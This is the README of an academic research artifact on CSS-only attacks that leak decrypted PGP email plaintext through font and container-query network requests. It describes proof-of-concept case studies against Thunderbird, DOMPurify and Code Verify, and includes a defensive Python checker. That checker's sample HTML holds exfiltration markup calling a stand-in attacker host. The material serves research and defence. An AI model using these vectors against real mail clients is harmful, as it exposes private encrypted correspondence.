This repository contains the artifact for the paper "Styled to Steal: The Overlooked Attack Surface in Email Clients" published at ACM CCS 2025.
This artifact accompanies "Styled to Steal: The Overlooked Attack Surface in Email Clients" and provides a collection of proof-of-concept implementations demonstrating CSS-based plaintext extraction attacks against encrypted email systems. The artifact contains minimal examples illustrating the core attack technique using container queries, lazy-loaded web-fonts, and contextual font ligatures to map plaintext characters to unique network requests. We include complete case studies targeting Mozilla Thunderbird, DOMPurify sanitization, and Meta's Code Verify system, demonstrating successful plaintext exfiltration from PGP-encrypted emails without JavaScript execution. The artifact provides an evaluation framework for assessing HTML sanitizer libraries and PGP email clients against these scriptless attacks. Through reproducible examples, we show how three benign CSS features can be combined to achieve complete plaintext recovery in a single rendering pass, bypassing state-of-the-art content sanitization mechanisms across multiple browser engines. The provided implementations enable researchers to verify our findings, test additional email clients and sanitization systems, and develop improved countermeasures against CSS-based exfiltration techniques. This artifact demonstrates that existing content isolation mechanisms in email client software are insufficient to prevent encrypted content leakage through CSS-only attack vectors.
The repository is structured into four different directories, each containing a specific part of the artifact:
- example: A minimal example demonstrating the core attack technique.
- casestudies: Complete case studies targeting Thunderbird, DOMPurify and Code Verify.
- misc: Additional materials, including minimal reproducers and DOMs from vulnerable email clients.
- study: Evaluation framework for assessing HTML sanitizer libraries and PGP email clients.
More details about the individual directories can be found in their respective README.md files.
Our artifact requires recent versions of Python, Node.js, and Docker. We have tested the artifact with the following versions:
- Python 3.12.3
- Node.js 23.7.0
- Docker 28.3.3
Additionally, for the Thunderbird experiments, you need:
- Mozilla Thunderbird Version 115.7 (available at: https://archive.mozilla.org/pub/thunderbird/releases/115.7.0/)
- Install Python, Node.js and Docker on your system
- Clone the artifact repository from GitHub and navigate to the root directory of the cloned repository
- Install Mozilla Thunderbird Version 115.7 from: https://archive.mozilla.org/pub/thunderbird/releases/115.7.0/
  - Choose the appropriate version for your operating system and locale
  - On first launch, configure the following settings:
    - Turn off automatic updates: Settings > General > Updates: "Check for updates, but let me choose whether to install them"
    - Set up any email account in Thunderbird first
    - Import the private key: Settings > Account Settings > End-To-End Encryption > OpenPGP. The key can be found in the casestudies/email/ directory
    - Enable remote content: Settings > Privacy & Security > Mail Content: "Allow remote content in messages"
- For Code Verify experiments, install the modified Code Verify extension:
  - Enable developer mode in your Chromium-based browser
  - Load the unpacked extension from the casestudies/accountable/chrome-extension/ directory
Before running experiments, verify your setup:
Open casestudies/email/test.eml in Mozilla Thunderbird. You should be able to decrypt the email and read its contents.
Open the developer tools while visiting https://websec.work/noattack.html in your Chromium-based browser and click on the icon of Meta's Code Verify extension in the toolbar. The extension should show a green checkmark, indicating that the page is verified.
Claims: A CSS-based attack can extract text from HTML documents. In Mozilla Thunderbird, we can extract PGP-encrypted plaintext from emails with keyword detection, 4-digit PIN recovery, and full-text extraction.
Preparation: Install Mozilla Thunderbird Version 115.7 and import Alice's PGP key as described in casestudies/email/README.md.
Execution: Run the three proof-of-concepts in the casestudies/email/ directory:
- Keyword detection (keywords/)
- PIN recovery (pin/)
- Full-text extraction (chain/)
Expected Results: Remote connections to the local server showing character-by-character plaintext extraction.
Claims: Default configurations of DOMPurify and Firefox's HTML Sanitizer API do not prevent our CSS-based attack.
Preparation & Execution: Follow steps in study/sanitizer/README.md.
Expected Results: Only DOMPurify allows CSS injections via link tags in its default configuration.
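To make the sanitizer claim above checkable in a defender's pipeline, here is an added example (not part of the artifact or the study/ framework) that parses a sanitizer's output and lists the CSS injection vectors the attack relies on: stylesheet link tags, style elements, and inline styles that can trigger a network request. The sample HTML, the attacker.example host and the heuristic `REMOTE_CSS` pattern are constructed for illustration.

```python
"""Added example: audit sanitized HTML for remaining CSS injection vectors."""
from html.parser import HTMLParser
import re

# Constructed sample of what a sanitizer in its default configuration might emit.
SAMPLE_SANITIZED = """
<p>Hello Alice</p>
<link rel="stylesheet" href="https://attacker.example/exfil.css">
<style>@font-face{font-family:f;src:url(https://attacker.example/f.woff)}</style>
<div style="background:url(https://attacker.example/leak)">secret</div>
"""

# Heuristic: CSS constructs that can cause a remote fetch (hypothetical, not
# the paper's evaluation criteria).
REMOTE_CSS = re.compile(r"url\s*\(|@import\b|@font-face\b", re.IGNORECASE)


class CssVectorFinder(HTMLParser):
    """Collects (kind, detail) tuples for each CSS vector left in the HTML."""

    def __init__(self):
        super().__init__()
        self.vectors = []
        self._style_buf = None  # non-None while inside a <style> element

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        rel = (attrs.get("rel") or "").lower().split()
        if tag == "link" and "stylesheet" in rel:
            self.vectors.append(("link-stylesheet", attrs.get("href") or ""))
        elif tag == "style":
            self._style_buf = []
        style = attrs.get("style")
        if style and REMOTE_CSS.search(style):
            self.vectors.append(("style-attr-remote", style))

    def handle_data(self, data):
        if self._style_buf is not None:
            self._style_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._style_buf is not None:
            css = "".join(self._style_buf).strip()
            kind = "style-element-remote" if REMOTE_CSS.search(css) else "style-element"
            self.vectors.append((kind, css))
            self._style_buf = None


def css_injection_vectors(html):
    """Return remaining CSS vectors; an empty list means no CSS injection survived."""
    finder = CssVectorFinder()
    finder.feed(html)
    finder.close()
    return finder.vectors
```

Run it over the output of each sanitizer configuration under test; a non-empty result for a default configuration corresponds to the "allows CSS injections" finding above.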
Claims: CSS-based attack works against DOMPurify's default configuration.
Execution: Run the server in casestudies/web/ and visit http://localhost:3000.
Expected Results: Character-by-character extraction from the HTML document, similar to the Thunderbird attack.
Claims: Meta's Code Verify extension only signs JavaScript, not stylesheets, allowing CSS-based attacks to bypass verification.
Preparation: Install the modified Code Verify extension from casestudies/accountable/chrome-extension/.
Execution: Visit https://websec.work/attack.html with the extension installed.
Expected Results: Remote connection leaking PIN (5606) while Code Verify shows green checkmark (verified).
For detailed reproduction steps, see the respective README files:
- casestudies/README.md - Complete case studies
- study/README.md - HTML sanitizer evaluation framework